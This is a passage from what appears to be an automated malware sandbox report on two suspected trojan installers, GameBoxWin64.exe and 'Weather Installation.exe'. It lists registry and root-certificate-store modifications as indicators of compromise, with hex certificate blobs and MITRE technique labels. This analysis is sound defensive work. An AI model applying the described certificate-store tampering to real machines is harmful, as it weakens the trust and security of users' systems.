Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe

Modifies registry class 5 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\

Modifies system certificate store 2 TTPs 14 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

GameBoxWin64.exeWeather Installation.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	GameBoxWin64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E	GameBoxWin64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E	Weather Installation.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	GameBoxWin64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7	Weather Installation.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	Weather Installation.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	Weather Installation.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Weather Installation.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	GameBoxWin64.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B	Weather Installation.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	GameBoxWin64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff958